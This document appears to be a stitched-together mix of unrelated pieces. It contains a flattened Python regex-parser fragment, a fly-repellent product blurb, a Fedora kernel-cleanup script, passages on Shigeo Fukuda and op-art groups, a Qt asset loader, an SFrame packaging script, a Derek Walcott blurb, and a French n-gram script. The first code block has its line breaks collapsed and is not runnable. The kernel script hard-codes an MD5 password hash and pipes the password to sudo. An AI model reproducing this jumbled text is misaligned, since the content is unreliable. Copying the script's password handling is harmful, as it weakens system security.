def parse(str, flags=0, pattern=None): # parse 're' pattern into 
list of (opcode, argument) tuples source = Tokenizer(str) if pattern is None: pattern = Pattern() pattern.flags = flags pattern.str = str p = _parse_sub(source, pattern, 0) tail = source.get() if tail == ")": raise error, "unbalanced parenthesis" elif tail: raise error, "bogus characters at end of regular expression" if flags & SRE_FLAG_DEBUG: p.dump() if not (flags & SRE_FLAG_VERBOSE) and p.pattern.flags & SRE_FLAG_VERBOSE: # the VERBOSE flag was switched on inside the pattern. to be # on the safe side, we'll parse the whole thing again... return parse(str, p.pattern.flags) return p def parse_template(source, pattern): # parse 're' replacement string into list of literals and # group references s = Tokenizer(source) p = [] a = p.append def literal(literal, p=p): if p and p[-1][0] is LITERAL: p[-1] = LITERAL, p[-1][1] + literal else: p.append((LITERAL, literal)) sep = source[:0] if type(sep) is type(""): makechar = chr else: makechar = unichr while 1: this = s.get() if this is None: break # end of replacement string if this and this[0] == "\\": # group if this == "\\g": name = "" if s.match("<"): while 1: char = s.get() if char is None: raise error, "unterminated group name" if char == ">": break name = name + char if not name: raise error, "bad group name" try: index = atoi(name) except ValueError: if not isname(name): raise error, "bad character in group name" try: index = pattern.groupindex[name] except KeyError: raise IndexError, "unknown group name" a((MARK, index)) elif len(this) > 1 and this[1] in DIGITS: code = None while 1: group = _group(this, pattern.groups+1) if group: if (s.next not in DIGITS or not _group(this + s.next, pattern.groups+1)): code = MARK, group break elif s.next in OCTDIGITS: this = this + s.get() else: break if not code: this = this[1:] code = LITERAL, makechar(atoi(this[-6:], 8) & 0xff) if code[0] is LITERAL: literal(code[1]) else: a(code) else: try: this = makechar(ESCAPES[this][1]) except KeyError: pass literal(this) else: 
literal(this) # convert template to groups and literals lists i = 0 groups = [] literals = [] for c, s in p: if c is MARK: groups.append((i, s)) literals.append(None) else: literals.append(s) i = i + 1 return groups, literals def expand_template(template, match): g = match.group sep = match.string[:0] groups, literals = template literals = literals[:] try: for index, group in groups: literals[index] = s = g(group) if s is None: raise IndexError except IndexError: raise error, "empty group" return string.join(literals, sep)
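The "octal escape *or* decimal group reference (sigh)" ambiguity handled in `_escape` also shows up in replacement templates, as `parse_template` above makes clear: a backslash followed by digits is a group reference unless it forms exactly three octal digits. A quick illustration through the public `re` API, which routes through this parser:

```python
import re

# \1 and \2 in a replacement template are decimal group references.
swapped = re.sub(r"(a)(b)", r"\2\1", "ab")
print(swapped)  # the two captured groups, swapped

# Three octal digits are taken as a character escape instead:
# \101 is chr(0o101), i.e. "A", not a reference to group 101.
octal = re.sub("x", r"\101", "x")
print(octal)
```

This is why the parser builds the escape up one digit at a time and re-checks `_group` at each step before falling back to the octal interpretation.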
Two inserts per pack. Inserts contain a unique blend of essential oils. Eco-friendly and long lasting. An inexpensive alternative to toxic chemical sprays and wipes. Customized for Fly Armor Gear. Lasts approximately four weeks. CAUTION: DO NOT ALLOW CHILDREN TO PLAY WITH THIS BAND. IT IS NOT TO BE PLACED IN THE MOUTH OR TAKEN INTERNALLY BY MAN OR ANIMAL. ANIMALS SHOULD NOT BE PERMITTED TO CHEW ON BAND.
#!/usr/bin/env python3 # -*- coding: utf-8 -*- r""" # .---. .----------- # / \ __ / ------ # / / \( )/ ----- (`-') _ _(`-') <-. (`-')_ # ////// '\/ ` --- ( OO).-/( (OO ).-> .-> \( OO) ) .-> # //// / // : : --- (,------. \ .'_ (`-')----. ,--./ ,--/ ,--.' ,-. # // / / / `\/ '-- | .---' '`'-..__)( OO).-. ' | \ | | (`-')'.' / # // //..\\ (| '--. | | ' |( _) | | | | . '| |)(OO \ / # ============UU====UU==== | .--' | | / : \| |)| | | |\ | | / /) # '//||\\` | `---. | '-' / ' '-' ' | | \ | `-/ /` # ''`` `------' `------' `-----' `--' `--' `--' # ###################################################################################### # # Author: edony - edonyzpc@gmail.com # # twitter : @edonyzpc # # Last modified: 2015-06-02 20:50 # # Filename: kernelclean.py # # Description: All Rights Are Reserved # """ #import scipy as sp #import math as m #import matplotlib as mpl #import matplotlib.pyplot as plt #from mpl_toolkits.mplot3d import Axes3D as Ax3 #from scipy import stats as st #from matplotlib import cm #import numpy as np from __future__ import absolute_import import os import re import sys import subprocess as sp import platform as pf from getpass import getpass import hashlib if sys.version.startswith("3.4."): from functools import reduce from packages.fileparser.extractor import Extractor class PyColor(object): """ This class is for colored print in the python interpreter! 
"F3" call Addpy() function to add this class which is defined in the .vimrc for vim Editor.""" def __init__(self): self.self_doc = r""" STYLE: \033['display model';'foreground';'background'm DETAILS: FOREGROUND BACKGOUND COLOR --------------------------------------- 30 40 black 31 41 red 32 42 green 33 43 yellow 34 44 blue 35 45 purple 36 46 cyan 37 47 white DISPLAY MODEL DETAILS ------------------------- 0 default 1 highlight 4 underline 5 flicker 7 reverse 8 non-visiable e.g: \033[1;31;40m <!--1-highlight;31-foreground red;40-background black--> \033[0m <!--set all into default--> """ self.warningcolor = '\033[0;31m' self.tipcolor = '\033[0;32m' self.endcolor = '\033[0m' self._newcolor = '' @property def new(self): """ Customized Python Print Color. """ return self._newcolor @new.setter def new(self, color_str): """ New Color. """ self._newcolor = color_str def disable(self): """ Disable Color Print. """ self.warningcolor = '' self.endcolor = '' class KernelClean(object): """ Cleanup the Fedora Linux kernel after `dnf(yum) update`. 
""" def __init__(self, check=0): self._filebuf = 'kernelclean' self.kernel = '' self.exist_kernels = [] self.old_kernel = [] self.kernel_clean = [] self.color = PyColor() # self.check for manual check to remove system kernel(1 for check, 0 for not check) self.check = check self.record = [] def in_using_kernel(self): """ RPM query about the kernel existing in the system => self._filebuf Get the version of running kernel => self.kernel ***rewrite the using kernel finding*** command_rpm_kernel = 'rpm -qa | grep "^kernel-" > ' command_rpm_kernel += self._filebuf os.system(command_rpm_kernel) command_kernel = 'uname -r' pipeout = sp.Popen(command_kernel.split(), stdout=sp.PIPE) self.kernel = pipeout.stdout.readline().rstrip().decode('utf-8') """ pipeout = sp.Popen('uname -r'.split(), stdout=sp.PIPE) self.kernel = pipeout.stdout.readline().rstrip().decode('utf-8') out = sp.Popen('rpm -qa'.split(), stdout=sp.PIPE) for ls in out.stdout.readlines(): pattern = '^kernel-' ls = ls.rstrip().decode('utf-8') if re.match(pattern, ls): self.exist_kernels.append(ls) def find_old_kernel(self): """ Find the old kernel in system => self.old_kernel """ pattern = "^kernel-[a-zA-Z-]*([0-9.-]*)([a-zA-Z]+)(.*)" self.record = set([re.match(pattern, item).groups() for item in self.exist_kernels]) self.old_kernel = [item for item in self.record if item[0] not in self.kernel] def to_cleaned_kernel(self): """ Ensure the to be cleaned kernel in queried list => self.kernelclean """ if self.old_kernel: kernel_clean_id = [] [kernel_clean_id.append(''.join(item)) for item in list(self.old_kernel)] for id in kernel_clean_id: [self.kernel_clean.append(item) for item in self.exist_kernels if id in item] def cleanup(self): """ Cleanup the old kernel """ if self.old_kernel: reboot = input(self.color.endcolor + 'Do You Need to Reboot System?(y or n)\n') if reboot == 'y': os.system('reboot') elif reboot == 'n': print(self.color.warningcolor + 'Cleanup Kernel ...' 
+ self.color.endcolor) pwd_md5 = 'b04c541ed735353c44c52984a1be27f8' pwd = getpass("Enter Your Password: ") if hashlib.md5(pwd.encode('utf-8')).hexdigest() != pwd_md5: print(self.color.warningcolor + "Wrong Password" + self.color.endcolor) print('\033[0;36m' + "Try Angain" + '\033[0m') pwd = getpass("Enter Your Password: ") if hashlib.md5(pwd.encode('utf-8')).hexdigest() != pwd_md5: return echo = ['echo'] echo.append(pwd) if pf.linux_distribution()[1] > '21': command = 'sudo -S dnf -y remove ' for item in self.kernel_clean: command += item command += ' ' else: command = 'sudo -S yum -y remove ' for item in self.kernel_clean: command += item command += ' ' pipein = sp.Popen(echo, stdout=sp.PIPE) pipeout = sp.Popen(command.split(), stdin=pipein.stdout, stdout=sp.PIPE) for line in pipeout.stdout.readlines(): if line == '': break if isinstance(line, bytes): line = line.decode() print(line) print(self.color.tipcolor + 'End Cleanup!' + self.color.endcolor) print(self.color.warningcolor +\ 'Your Kernel is Update!' +\ self.color.endcolor) def main(self): """ Union the cleanup stream """ self.in_using_kernel() self.find_old_kernel() self.to_cleaned_kernel() if self.check == 1: if self.old_kernel: print(self.color.tipcolor + 'Your Old Kernel: ') for item in self.old_kernel: print(''.join(item)) print(self.color.warningcolor + 'In Using Kernel: ') print(self.kernel + self.color.endcolor) check_cmd = input('Remove the old kernel?(y or n)\n') if check_cmd == 'y': self.cleanup() else: print('\033[36m' + 'Do Not Remove Old kernel' + '\033[0m') else: print(self.color.tipcolor +\ 'Your System Has No Old Kernel To Cleanup!' +\ self.color.endcolor) if __name__ == '__main__': TEST = KernelClean(1) TEST.in_using_kernel() TEST.find_old_kernel() TEST.to_cleaned_kernel()
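The pattern used in `find_old_kernel` splits an installed package name into a version/release prefix, a distro tag, and a trailing suffix, so kernels whose version digits do not appear in `uname -r` can be flagged as old. A quick sanity check of that regex in isolation — the package string below is a hypothetical `rpm -qa` output line, chosen only for illustration:

```python
import re

# The same pattern the script uses to decompose kernel package names.
pattern = r"^kernel-[a-zA-Z-]*([0-9.-]*)([a-zA-Z]+)(.*)"

# Hypothetical Fedora kernel package name.
match = re.match(pattern, "kernel-core-5.8.15-201.fc32.x86_64")
print(match.groups())
```

Group 1 carries the version-release digits that `find_old_kernel` compares against the running kernel's `uname -r` string.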
Shigeo Fukuda was a sculptor, graphic artist and poster designer who created optical illusions. His art pieces usually portray deception, such as Lunch With a Helmet On, a sculpture created entirely from forks, knives, and spoons, that casts a detailed shadow of a motorcycle. Fukuda was born on February 4, 1932 in Tokyo to a family that was involved in manufacturing toys. After the end of World War II, he became interested in the minimalist Swiss Style of graphic design, and graduated from Tokyo National University of Fine Arts and Music in 1956. In 1987, Fukuda was inducted into the Art Directors Club Hall of Fame in New York City, which described him as "Japan's consummate visual communicator", making him the first Japanese designer chosen for this recognition. The Art Directors Club noted the "bitingly satirical commentary on the senselessness of war" shown in "Victory 1945", which won him the grand prize at the 1975 Warsaw Poster Contest, a competition whose proceeds went to the Peace Fund Movement. His home outside Tokyo featured a 4-foot-high (1.2 m) front door that would appear far away from someone approaching the house. This door was a visual trick, with the actual entrance to the house being an unornamented white door designed to blend in seamlessly with the walls of the house. In 1965, an exhibition called The Responsive Eye, created by William C. Seitz was held at the Museum of Modern Art in New York City. The works shown were wide ranging, encompassing the minimalism of Frank Stella and Ellsworth Kelly, the smooth plasticity of Alexander Liberman, the collaborative efforts of the Anonima group, alongside the well-known Victor Vasarely, Richard Anuszkiewicz, and Bridget Riley. The exhibition focused on the perceptual aspects of art, which result both from the illusion of movement and the interaction of color relationships.
The exhibition was enormously popular with the general public, though less so with the critics. Critics dismissed op art as portraying nothing more than trompe l'oeil, or tricks that fool the eye. Regardless, op art's popularity with the public increased, and op art images were used in a number of commercial contexts. Bridget Riley tried to sue an American company, without success, for using one of her paintings as the basis of a fabric design. The American artist collaborative, Anonima Group, was founded in Cleveland, Ohio in 1960 by Ernst Benkert, Francis Hewitt and Ed Mieczkowski. Propelled by their rejection of the cult of the ego and automatic style of the Abstract Expressionists, the artists worked collaboratively on grid-based, spatially fluctuating drawings and paintings that were precise investigations of the scientific phenomena and psychology of optical perception. The work was accompanied by writings: proposals, projects and manifestos - socialist in nature - which the artists considered essential to the experience and understanding of their work. Their drawings, paintings and writings, which had much in common with the positions of artist Ad Reinhardt, and with the Russian Constructivists, were included in the 1965 Responsive Eye exhibit at the Museum of Modern Art. Along with other artists in the exhibit, Anonima's work was incorrectly relegated to what came to be the highly commercialized and publicized category of Op Art. A recent reconsideration and recontextualization of Op Art, the expansive 2006 Optic Nerve exhibit at the Columbus Museum of Art, places the Anonima as the sole American collaborative group, along with the European Zero Group, Gruppo N, GRAV and others, who were examining new optical information at that time. Zero is an artist group founded in Düsseldorf by Heinz Mack and Otto Piene. Piene described it as “a zone of silence and of pure possibilities for a new beginning.” In 1961 Günther Uecker joined the Zero group. 
ZERO stands for the international movement, with artists from Germany, Holland, Belgium, France, Switzerland, and Italy. The Gruppo N was born in 1959 in Padua as a free association called Ennea. The following year, five of the original nine members remained: Alberto Biasi, Ennio Chiggio, Toni Costa, Edoardo Landi, and Manfredo Massironi, who named the group N, the first truly anonymous group. Other groups were born earlier: Exact 51 in Zagreb in 1951, and Equipo 57 in Spain in 1957; others followed in 1960, Group T in Milan and GRAV in Paris. The Group N had strong innovative ideas in all directions of behavior and design. "The term enne distinguishes a group of experimental designers united by the need to collectively research." Groupe de Recherche d'Art Visuel (GRAV) (Research Art Group) was a collaborative artists group in Paris that consisted of eleven opto-kinetic artists who picked up on Victor Vasarely's concept that the sole artist was outdated and which, according to its 1963 manifesto, appealed to the direct participation of the public with an influence on its behavior, notably through the use of interactive labyrinths. GRAV was active in Paris from 1960 to 1968. Their main aim was to merge the individual identities of the members into a collective and individually anonymous activity linked to the scientific and technological disciplines based around collective events called Labyrinths. Their ideals enticed them to investigate a wide spectrum of kinetic art and op art optical effects by using various types of artificial light and mechanical movement. In their first Labyrinth, held in 1963 at the Paris Biennale, they presented three years' work based on optical and kinetic devices. Thereafter they discovered that their effort to engage the human eye had shifted their concerns towards those of spectator participation; a foreshadow of interactive art.
Equipo 57 is the foremost example of radical geometric abstract art in Spain, and its work, in both practice and theory, defends an art of social commitment. In 1957 the group made its artistic aims public through a manifesto: the denunciation of production and market mechanisms, the desire to renew the artistic situation of the day, the search for a social function for art, and the integration of the artist into society. In this, the group shared the activist attitude characteristic of these avant-garde groups and, in the words of Ángel Llorente, its work "shows the alternative that the Equipo advanced: the defence of a new artistic behaviour in society. An assumed social commitment, although there are some contradictions, regarding the artistic practice of geometric abstraction." To carry out these objectives, the group turned to rationalist and analytical tendencies that carried the strong stamp of scientific approaches. The beginnings of Equipo 57 are intertwined with painting and a consequent artistic theory. As Llorente notes, its members moved from painting and its theoretical production to sculpture and architecture, as a logical consequence of their research on physical and architectural space (based on surfaces) and the interactivity of artistic space.
import os
import sys
import itertools

from ...vendor.Qt import QtWidgets, QtCore
from ... import api
from .. import lib

self = sys.modules[__name__]
self._window = None

# Store previous results from api.ls()
self._cache = list()
self._use_cache = False

# Custom roles
AssetRole = QtCore.Qt.UserRole + 1
SubsetRole = QtCore.Qt.UserRole + 2


class Window(QtWidgets.QDialog):
    """Basic asset loader interface

     _________________________________________
    |                                         |
    | Assets                                  |
    |  _____________________________________  |
    | |                  |                  | |
    | | Asset 1          | Subset 1         | |
    | | Asset 2          | Subset 2         | |
    | | ...              | ...              | |
    | |                  |                  | |
    | |                  |                  | |
    | |                  |                  | |
    | |                  |                  | |
    | |__________________|__________________| |
    |  _____________________________________  |
    | |                                     | |
    | |                Load                 | |
    | |_____________________________________| |
    |_________________________________________|

    """

    def __init__(self, parent=None):
        super(Window, self).__init__(parent)
        self.setWindowTitle("Asset Loader")
        self.setFocusPolicy(QtCore.Qt.StrongFocus)

        body = QtWidgets.QWidget()
        footer = QtWidgets.QWidget()

        container = QtWidgets.QWidget()

        assets = QtWidgets.QListWidget()
        subsets = QtWidgets.QListWidget()

        # Enable loading many subsets at once
        subsets.setSelectionMode(subsets.ExtendedSelection)

        layout = QtWidgets.QHBoxLayout(container)
        layout.addWidget(assets)
        layout.addWidget(subsets)
        layout.setContentsMargins(0, 0, 0, 0)

        options = QtWidgets.QWidget()
        layout = QtWidgets.QGridLayout(options)
        layout.setContentsMargins(0, 0, 0, 0)

        autoclose_checkbox = QtWidgets.QCheckBox("Close after load")
        autoclose_checkbox.setCheckState(QtCore.Qt.Checked)
        layout.addWidget(autoclose_checkbox, 1, 0)

        layout = QtWidgets.QVBoxLayout(body)
        layout.addWidget(container)
        layout.addWidget(options, 0, QtCore.Qt.AlignLeft)
        layout.setContentsMargins(0, 0, 0, 0)

        load_button = QtWidgets.QPushButton("Load")
        refresh_button = QtWidgets.QPushButton("Refresh")
        stop_button = QtWidgets.QPushButton("Searching..")
        stop_button.setToolTip("Click to stop searching")
        message = QtWidgets.QLabel()
        message.hide()

        layout = QtWidgets.QVBoxLayout(footer)
        layout.addWidget(load_button)
        layout.addWidget(stop_button)
        layout.addWidget(refresh_button)
        layout.addWidget(message)
        layout.setContentsMargins(0, 0, 0, 0)

        layout = QtWidgets.QVBoxLayout(self)
        layout.addWidget(body)
        layout.addWidget(footer)

        self.data = {
            "state": {
                "running": False,
            },
            "button": {
                "load": load_button,
                "stop": stop_button,
                "autoclose": autoclose_checkbox,
            },
            "model": {
                "assets": assets,
                "subsets": subsets,
            },
            "label": {
                "message": message,
            }
        }

        load_button.clicked.connect(self.on_load_pressed)
        stop_button.clicked.connect(self.on_stop_pressed)
        refresh_button.clicked.connect(self.on_refresh_pressed)
        assets.currentItemChanged.connect(self.on_assetschanged)
        subsets.currentItemChanged.connect(self.on_subsetschanged)

        # Defaults
        self.resize(320, 350)

        load_button.hide()
        stop_button.setFocus()

    def keyPressEvent(self, event):
        """Delegate keyboard events"""
        if event.key() == QtCore.Qt.Key_Return:
            return self.on_enter()

    def on_enter(self):
        self.on_load_pressed()

    def on_assetschanged(self, *args):
        assets_model = self.data["model"]["assets"]
        subsets_model = self.data["model"]["subsets"]

        subsets_model.clear()

        asset_item = assets_model.currentItem()

        # The model is empty
        if asset_item is None:
            return

        asset = asset_item.data(AssetRole)

        # The model contains an empty item
        if asset is None:
            return

        for subset in asset["subsets"]:
            item = QtWidgets.QListWidgetItem(subset["name"])
            item.setData(QtCore.Qt.ItemIsEnabled, True)
            item.setData(SubsetRole, subset)
            subsets_model.addItem(item)

    def on_subsetschanged(self, *args):
        button = self.data["button"]["load"]
        item = self.data["model"]["assets"].currentItem()
        button.setEnabled(item.data(QtCore.Qt.ItemIsEnabled))

    def refresh(self):
        """Load assets from disk and add them to a QListView

        This method runs part-asynchronous, in that it blocks
        when busy, but takes brief intermissions between each
        asset found so as to lighten the load off of disk, and
        to enable the artist to abort searching once the target
        asset has been found.

        """

        assets_model = self.data["model"]["assets"]
        assets_model.clear()

        state = self.data["state"]

        has = {"assets": False}

        module = sys.modules[__name__]

        if module._use_cache:
            print("Using cache..")
            iterators = iter(module._cache)
        else:
            print("Reading from disk..")
            assets = api.ls(os.path.join(api.registered_root(), "assets"))
            film = api.ls(os.path.join(api.registered_root(), "film"))
            iterators = itertools.chain(assets, film)

        def on_next():
            if not state["running"]:
                return on_finished()

            try:
                asset = next(iterators)

                # Cache for re-use
                if not module._use_cache:
                    module._cache.append(asset)

            except StopIteration:
                return on_finished()

            has["assets"] = True

            item = QtWidgets.QListWidgetItem(asset["name"])
            item.setData(QtCore.Qt.ItemIsEnabled, True)
            item.setData(AssetRole, asset)
            assets_model.addItem(item)

            lib.defer(25, on_next)

        def on_finished():
            state["running"] = False
            module._use_cache = True

            if not has["assets"]:
                item = QtWidgets.QListWidgetItem("No assets found")
                item.setData(QtCore.Qt.ItemIsEnabled, False)
                assets_model.addItem(item)

            assets_model.setCurrentItem(assets_model.item(0))
            assets_model.setFocus()
            self.data["button"]["load"].show()
            self.data["button"]["stop"].hide()

        state["running"] = True
        lib.defer(25, on_next)

    def on_refresh_pressed(self):
        # Clear cache
        sys.modules[__name__]._cache[:] = []
        sys.modules[__name__]._use_cache = False
        self.refresh()

    def on_stop_pressed(self):
        button = self.data["button"]["stop"]
        button.setText("Stopping..")
        button.setEnabled(False)

        self.data["state"]["running"] = False

    def on_load_pressed(self):
        button = self.data["button"]["load"]
        if not button.isEnabled():
            return

        assets_model = self.data["model"]["assets"]
        subsets_model = self.data["model"]["subsets"]
        autoclose_checkbox = self.data["button"]["autoclose"]

        asset_item = assets_model.currentItem()

        for subset_item in subsets_model.selectedItems():
            if subset_item is None:
                return

            asset = asset_item.data(AssetRole)
            subset = subset_item.data(SubsetRole)

            assert asset
            assert subset

            try:
                api.registered_host().load(asset, subset)

            except ValueError as e:
                self.echo(e)
                raise

            except NameError as e:
                self.echo(e)
                raise

            # Catch-all
            except Exception as e:
                self.echo("Program error: %s" % str(e))
                raise

        if autoclose_checkbox.checkState():
            self.close()

    def echo(self, message):
        widget = self.data["label"]["message"]
        widget.setText(str(message))
        widget.show()
        print(message)

    def closeEvent(self, event):
        print("Good bye")
        self.data["state"]["running"] = False
        return super(Window, self).closeEvent(event)


def show(root=None, debug=False):
    """Display Loader GUI

    Arguments:
        debug (bool, optional): Run loader in debug-mode,
            defaults to False

    """

    if self._window:
        self._window.close()
        del self._window

    try:
        widgets = QtWidgets.QApplication.topLevelWidgets()
        widgets = dict((w.objectName(), w) for w in widgets)
        parent = widgets["MayaWindow"]
    except KeyError:
        parent = None

    # Debug fixture
    fixture = api.fixture(assets=["Ryan",
                                  "Strange",
                                  "Blonde_model"])

    with fixture if debug else lib.dummy():
        with lib.application():
            window = Window(parent)
            window.show()
            window.refresh()

            self._window = window
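The refresh() method above pulls one item at a time from an iterator and re-schedules itself via lib.defer, so the GUI stays responsive while scanning disk. That pattern can be sketched independently of Qt. This is a minimal sketch: Scheduler and consume_chunked are invented names, and Scheduler.defer is a toy stand-in for lib.defer(ms, callback) that ignores delays.

```python
import itertools
from collections import deque


class Scheduler:
    """Toy event loop: `defer` queues a callback, `run` drains the queue."""
    def __init__(self):
        self.queue = deque()

    def defer(self, callback):
        # Stand-in for lib.defer(delay, callback); delays are ignored here.
        self.queue.append(callback)

    def run(self):
        while self.queue:
            self.queue.popleft()()


def consume_chunked(iterator, on_item, on_finished, scheduler, state):
    """Pull one item per scheduled step so a real event loop stays responsive."""
    def on_next():
        if not state["running"]:
            return on_finished()
        try:
            item = next(iterator)
        except StopIteration:
            return on_finished()
        on_item(item)
        scheduler.defer(on_next)  # re-schedule instead of looping

    state["running"] = True
    scheduler.defer(on_next)


# Example: interleave two sources, as refresh() chains "assets" and "film"
found = []
state = {"running": True}
sched = Scheduler()
consume_chunked(itertools.chain(["a", "b"], ["c"]),
                found.append,
                lambda: state.update(running=False),
                sched, state)
sched.run()
print(found)  # → ['a', 'b', 'c']
```

Setting state["running"] to False from outside (as on_stop_pressed does) makes the next scheduled step bail out via on_finished, which is how the "stop searching" button cancels the scan.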
#!/usr/bin/env python
# $Id: sframe_parMaker.py 344 2012-12-13 13:10:53Z krasznaa $
#***************************************************************************
#* @Project: SFrame - ROOT-based analysis framework for ATLAS
#* @Package: Core
#*
#* @author Stefan Ask       <Stefan.Ask@cern.ch>           - Manchester
#* @author David Berge      <David.Berge@cern.ch>          - CERN
#* @author Johannes Haller  <Johannes.Haller@cern.ch>      - Hamburg
#* @author A. Krasznahorkay <Attila.Krasznahorkay@cern.ch> - NYU/Debrecen
#*
#***************************************************************************
#
# Script creating a PAR package from the contents of a directory.
# (As long as the directory follows the SFrame layout...)

# Import base module(s):
import sys
import os.path
import optparse

def main():

    print " -- Proof ARchive creator for SFrame --"

    parser = optparse.OptionParser( usage="%prog [options]" )
    parser.add_option( "-s", "--srcdir", dest="srcdir",
                       action="store", type="string", default="./",
                       help="Directory that is to be converted" )
    parser.add_option( "-o", "--output", dest="output",
                       action="store", type="string", default="Test.par",
                       help="Output PAR file" )
    parser.add_option( "-m", "--makefile", dest="makefile",
                       action="store", type="string", default="Makefile",
                       help="Name of the makefile in the package" )
    parser.add_option( "-i", "--include", dest="include",
                       action="store", type="string", default="include",
                       help="Directory holding the header files" )
    parser.add_option( "-c", "--src", dest="src",
                       action="store", type="string", default="src",
                       help="Directory holding the source files" )
    parser.add_option( "-p", "--proofdir", dest="proofdir",
                       action="store", type="string", default="proof",
                       help="Directory holding the special files for PROOF" )
    parser.add_option( "-v", "--verbose", dest="verbose",
                       action="store_true",
                       help="Print verbose information about package creation" )

    ( options, garbage ) = parser.parse_args()

    if len( garbage ):
        # "garbage" is a list, so it has to be joined before printing:
        print "The following options were not recognised:"
        print ""
        print "   " + " ".join( garbage )
        parser.print_help()
        return

    if options.verbose:
        print " >> srcdir   = " + options.srcdir
        print " >> output   = " + options.output
        print " >> makefile = " + options.makefile
        print " >> include  = " + options.include
        print " >> src      = " + options.src
        print " >> proofdir = " + options.proofdir

    import PARHelpers
    PARHelpers.PARMaker( options.srcdir, options.makefile, options.include,
                         options.src, options.proofdir, options.output,
                         options.verbose )

    return

# Call the main function:
if __name__ == "__main__":
    main()
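The script above uses optparse, which has been deprecated since Python 2.7. On Python 3 the same option set can be declared with the standard-library argparse module. This is a hedged sketch, not part of SFrame itself; the option names simply mirror the script above.

```python
import argparse


def make_parser():
    parser = argparse.ArgumentParser(usage="%(prog)s [options]")
    parser.add_argument("-s", "--srcdir", default="./",
                        help="Directory that is to be converted")
    parser.add_argument("-o", "--output", default="Test.par",
                        help="Output PAR file")
    parser.add_argument("-m", "--makefile", default="Makefile",
                        help="Name of the makefile in the package")
    parser.add_argument("-i", "--include", default="include",
                        help="Directory holding the header files")
    parser.add_argument("-c", "--src", default="src",
                        help="Directory holding the source files")
    parser.add_argument("-p", "--proofdir", default="proof",
                        help="Directory holding the special files for PROOF")
    parser.add_argument("-v", "--verbose", action="store_true",
                        help="Print verbose information about package creation")
    return parser


# argparse rejects unrecognised options by default, which replaces the
# manual `garbage` check; parse_known_args() would restore the old behaviour.
options = make_parser().parse_args(["-s", "../MyPkg", "-v"])
print(options.srcdir, options.verbose)  # → ../MyPkg True
```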
The poet and playwright Derek Walcott was born on this day in 1930 in Saint Lucia, an island country in the eastern Caribbean. He was awarded the Nobel Prize in Literature in 1992 “for a poetic oeuvre of great luminosity, sustained by a historical vision, the outcome of a multicultural commitment”. How does Walcott’s verse rate? The poetry critic William Logan summed it up with faint praise: “No living poet has written verse more delicately rendered or distinguished than Walcott, though few individual poems seem destined to be remembered.” This one is, we feel.
import sys
import math
from collections import defaultdict, Counter

import nltk
from nltk.util import ngrams
import matplotlib.pyplot as plt
from wordcloud import WordCloud

sys.path.insert(
    0,
    '/Users/diakite_w/Documents/Dev/ExperimentationsACA/FrenchLefffLemmatizer')
from FrenchLefffLemmatizer import FrenchLefffLemmatizer


def read_txt(textfile):
    '''Read a text file and strip line breaks and hyphenation artifacts'''
    with open(textfile, 'r') as f:
        text = f.read()
    text = text.replace('\n', ' ')
    text = text.replace('- ', '')
    text = text.replace('.', '')
    text = text.replace('-', '')
    text = text.replace("‘l'", 'ï')
    return text


def display_wordcloud(tokens):
    '''Display a simple wordcloud from processed tokens'''
    # Join all tokens to make one big string
    join_text = ' '.join(tokens)
    wordcloud = WordCloud(background_color='white',
                          width=1200,
                          height=1000).generate(join_text)
    plt.imshow(wordcloud)
    plt.axis('off')
    plt.show()


def tokenizer(text, stopwords):
    '''Lowercase, tokenize, clean and lemmatize a French text'''
    fll = FrenchLefffLemmatizer()
    # splck = SpellChecker()  # optional spell checking, dependency left out

    # Put everything to lower case
    text = text.lower()

    # Tokenize text
    tokens = nltk.tokenize.word_tokenize(text)
    print('Nombre de tokens dans le texte :', len(tokens))

    # Remove contracted pronouns from tokens ("l'arbre" -> "arbre", ...)
    contracted_pronouns = ["l'", "m'", "n'", "d'", "c'", "j'", "qu'", "s'"]
    tokens = [t[2:] if t[:2] in contracted_pronouns else t for t in tokens]

    # Spell check every token (disabled together with SpellChecker above)
    # tokens = [splck.correct(t) for t in tokens]

    # Remove all words with len <= 2, drop stop words, then lemmatize
    tokens = [t for t in tokens if len(t) > 2]
    tokens = [t for t in tokens if t not in stopwords]
    tokens = [fll.lemmatize(t) for t in tokens]
    print('Nombre de tokens apres traitement :', len(tokens), '\n')
    return tokens


def extract_ngrams(tokens, n):
    '''Return a Counter of n-grams'''
    return Counter(ngrams(tokens, n))


# Load stop words
stopwords = list(set(w.rstrip() for w in open('stopwords-fr.txt')))

# Read and tokenize the text file
text = read_txt('data/simple.txt')
tokens = tokenizer(text, stopwords)
vocabulary = list(set(tokens))

# Compute dictionary mapping each word (key) to its index
word_idx = {w: idx for idx, w in enumerate(vocabulary)}

# Count the number of times each word appears
word_count = defaultdict(int)
for token in tokens:
    word_count[token] += 1

# NOTE: idf is only meaningful over a collection of documents; with a single
# document math.log(1 / 1) is always 0, so no idf is computed here.

# Compute tf: raw counts normalised by the document length
word_tf = defaultdict(float)
for word in tokens:
    word_tf[word] += 1
for word in vocabulary:
    word_tf[word] /= len(tokens)

display_wordcloud(tokens)

# Extracting n-grams
bigrams = extract_ngrams(tokens, 2)
trigrams = extract_ngrams(tokens, 3)
for t in trigrams.most_common(3):
    print(t)
for t in bigrams.most_common(3):
    print(t)
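With a single document, idf degenerates to math.log(1/1) = 0 for every word; idf only discriminates once there is a collection of documents. This is a minimal sketch of tf-idf over several documents; the tiny whitespace-tokenised French corpus below is invented purely for illustration.

```python
import math
from collections import Counter


def tf_idf(documents):
    """documents: list of token lists. Returns one {word: tf-idf} dict per doc."""
    n_docs = len(documents)

    # Document frequency: in how many documents does each word appear?
    df = Counter(word for doc in documents for word in set(doc))
    idf = {w: math.log(n_docs / df[w]) for w in df}

    scores = []
    for doc in documents:
        counts = Counter(doc)
        # Term frequency: raw count normalised by document length
        tf = {w: counts[w] / len(doc) for w in counts}
        scores.append({w: tf[w] * idf[w] for w in tf})
    return scores


docs = [["le", "chat", "dort"],
        ["le", "chien", "dort"],
        ["le", "chat", "mange"]]
scores = tf_idf(docs)

# "le" appears in every document, so its idf (and tf-idf) is 0 everywhere
print(scores[0]["le"])  # → 0.0
```

Words shared by all documents score zero, while words specific to one document score highest, which is exactly the discrimination the single-document version cannot provide.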
